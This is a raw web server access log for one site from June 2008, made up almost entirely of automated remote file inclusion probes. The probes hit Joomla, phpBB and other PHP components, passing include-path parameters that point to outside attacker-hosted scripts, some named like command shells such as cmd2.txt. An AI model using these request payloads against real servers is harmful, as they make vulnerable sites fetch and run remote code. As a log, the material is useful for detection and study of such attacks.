87.246.68.52 - - [24/Jun/2008:10:50:35 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:50:44 -0700] "GET /logs/access_080309.log/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:50:48 -0700] "GET /logs/access.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:50:54 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:51:01 -0700] "GET /logs/access_080309.log/index.php?nuseo_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:51:03 -0700] "GET /logs/access.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:51:03 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:51:03 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:10:51:06 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:10:51:06 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:10:51:06 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:52:07 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.75.225.10 - - [24/Jun/2008:10:52:08 -0700] "GET /logs/access.log//admin/templates/template_thumbnail.php?thumb_template=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [24/Jun/2008:10:52:08 -0700] "GET //admin/templates/template_thumbnail.php?thumb_template=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [24/Jun/2008:10:52:09 -0700] "GET /logs//admin/templates/template_thumbnail.php?thumb_template=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:52:09 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:52:09 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:10:52:23 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:10:52:23 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:52:26 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:52:26 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:52:27 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:52:27 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:10:52:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:10:52:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:52:40 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:10:53:21 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:10:53:21 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:10:53:21 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:10:53:21 -0700] "GET /logs/access_080507.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:10:53:29 -0700] "GET /logs/access_080312.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:53:57 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:53:58 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:53:58 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.233.125 - - [24/Jun/2008:10:54:00 -0700] "GET /logs/access_080425.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.233.125 - - [24/Jun/2008:10:54:00 -0700] "GET /logs/access_080425.log/errors.php?error=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.233.125 - - [24/Jun/2008:10:54:00 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.233.125 - - [24/Jun/2008:10:54:00 -0700] "GET /errors.php?error=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.233.125 - - [24/Jun/2008:10:54:00 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.233.125 - - [24/Jun/2008:10:54:00 -0700] "GET /logs/errors.php?error=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:54:04 -0700] "GET /logs/access.log/index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:54:10 -0700] "GET /logs/index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:11 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:24 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:54:25 -0700] "GET /index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:54:41 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:10:55:03 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:10:55:03 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:10:55:03 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:55:05 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:55:05 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:55:05 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [24/Jun/2008:10:55:10 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:10:55:13 -0700] "GET /logs/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:55:30 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:55:30 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:55:30 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:10:55:34 -0700] "GET /index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.811" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:55:39 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:56:06 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:56:14 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:56:14 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:56:23 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:56:29 -0700] "GET /logs/access_080105.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:10:56:36 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:56:37 -0700] "GET /logs/access.log/index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:56:42 -0700] "GET /index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:56:42 -0700] "GET /logs/index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:56:46 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:56:53 -0700] "GET /logs/access_080105.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:57:28 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:57:28 -0700] "GET /classes/core/language.php?rootdir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:57:29 -0700] "GET /logs/classes/core/language.php?rootdir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:57:31 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:57:31 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:57:32 -0700] "GET /logs/access_080105.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:57:34 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:57:34 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:57:36 -0700] "GET /logs/access_080105.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:57:47 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:57:47 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:58:13 -0700] "GET /logs/access_080421.log//components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:58:13 -0700] "GET /logs/access_080421.log//components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:58:14 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:58:14 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:10:58:24 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.225.10 - - [24/Jun/2008:10:58:24 -0700] "GET //admin/templates/template_thumbnail.php?thumb_template=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:58:24 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:10:58:25 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:58:25 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:58:25 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:58:33 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:58:33 -0700] "GET //skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:58:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:58:34 -0700] "GET /logs/access_080105.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:58:37 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:58:37 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:58:55 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:58:56 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:58:56 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:58:56 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:58:56 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:59:04 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:05 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:59:05 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:08 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:08 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:10:59:14 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:10:59:14 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
